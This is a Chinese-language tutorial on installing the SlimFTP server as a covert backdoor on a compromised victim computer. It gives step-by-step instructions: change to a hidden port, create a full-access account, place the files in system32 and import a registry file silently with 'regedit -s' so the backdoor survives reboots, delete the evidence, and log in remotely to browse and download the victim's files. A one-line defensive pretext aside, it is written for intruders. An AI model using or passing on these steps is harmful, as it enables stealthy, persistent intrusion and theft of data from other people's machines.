为了帮助众多新手解决这个问题,笔者向大家推荐FTP服务端程序SlimFTP,入侵者借助它,可以将肉鸡瞬间变为唯我独享的FTP服务器,随心所欲地下载肉鸡上的资料,不必使用复杂的参数设置。
对于爱好“和平”的普通用户来说,这种方法也可以用于控制属于自己的远程计算机。如果你担心自己的机器沦为他人的盘中餐,那么你不妨在笔者的指引下看看入侵者是怎么利用SlimFTP玩转肉鸡的,从而了解SlimFTP的运作原理,研究进行防范的办法。
一、为何采用SlimFTP?
我们之所以会选择SlimFTP,是因为它体积小、运行隐蔽、设置简单却又能提供最基本的FTP服务。
在提供对入侵者而言最重要的上传、下载功能的同时,SlimFTP还可根据入侵者的要求更改FTP服务端口、设置用户权限,并支持多用户同时登录(你可以和好友一起分享肉鸡服务)。众多功能集于一身,SlimFTP对入侵一族来说确实是一件利器。
在本文中,笔者将以实例的形式进行讲解和操作(已经取得肉鸡的CMD命令提示符权限,这是安装SlimFTP的必备条件)。
二、SlimFTP本地设置
本地设置相当于给SlimFTP描绘了一幅入侵的蓝图让它读懂,从而为进一步进驻肉鸡做准备。
配置步骤分为本地设置和服务器设置两个部分。本地设置操作包括设置FTP参数、添加用户和权限等,对于入侵者而言,这是必须做的第一步。而服务器设置则需要在肉鸡上进行操作,主要是完成服务的启动。
1.修改配置文件
将程序压缩包解压到任意目录,直接用记事本打开其中的SlimFTPd.conf文件(这是服务器信息配制文件)。
找到第二段英文中的关键字BindPort,这就是端口设置的信息所在处,后面的数字21,就是程序默认的21端口,这个端口是入侵者用来连接的端口。对于入侵者而言,服务端口越隐蔽越好,笔者在此将它设置为7777。
2.添加用户
FTP服务的基本信息设置成功后,我们就可以开始添加用户了。在SlimFTPd.conf文件最下端我们可找到关键字“#”,在其后添加用户的格式为:
#
#password "密码"
#Mount / FTP根目录
#Allow / 控制权限
提示:拥有全部权限的代码为ALL。
例如,我们要建立一个拥有全部控制权限,根目录为D盘,密码为123456,用户名为cytkk的用户,则应该按照以下格式进行添加。
#
#password "123456"
#Mount / d:\
#Allow / All
提示:为了使SlimFTP拥有自启动功能,我们可以手动编写一段注册表文件(压缩包内的FTP.reg),使对方即使重新启动也无法摆脱控制。
三、让SlimFTP在肉鸡上安家
本地设置已经完成,现在我们要做的就是进入肉鸡的命令提示符下进行最后的安装操作,也就是让SlimFTPd在肉鸡上安家并且启动FTP服务供我们使用。
将FTP.reg、SlimFTPd.exe、SlimFTPd.conf、SlimFTPd.xml等4个文件都上传到肉鸡系统盘的system32目录下。接着运行指令“regedit.exe -s %SystemRoot%\system32\FTP.reg >nul”,这样一来,FTP.reg里的内容就被添加到注册表里了,添加完毕后,我们的SlimFTP在肉鸡上就会跟随系统启动而启动了。操作完成后,可别忘了删除FTP.reg。
至此,安装工作就全部完成了,在肉鸡重新启动之后,我们的FTP服务器就会随之在后台运行。
四、享受肉鸡,三种烹调方式
通过前面的一番设置之后,后门FTP服务终于悄无声息地在肉鸡上运行了。此时,迷惘的你还在为如何下载、修改文件而发愁?别急,此时有三种烹调方式助你享受肉鸡。
1.Web方式
Web方式依靠的就是浏览器内置的FTP浏览功能。
首先打开浏览器,在地址信息栏中按照以下格式输入登录命令“FTP://用户名:密码@肉鸡IP:SlimFTPd服务端口”,回车后即可在浏览器中看到肉鸡硬盘上的文件。
2.FTP命令行方式
运行本地机器的CMD,在提示符下输入命令“FTP”。启动FTP控制台后,在“FTP>”后输入“open 61.***.***.106 7777”并回车,会出现提示信息“Connected to 61.***.***.106”。稍等数秒,会出现SlimFTP的欢迎信息,输入用户名“cytkk”和密码“123456”即可成功登录。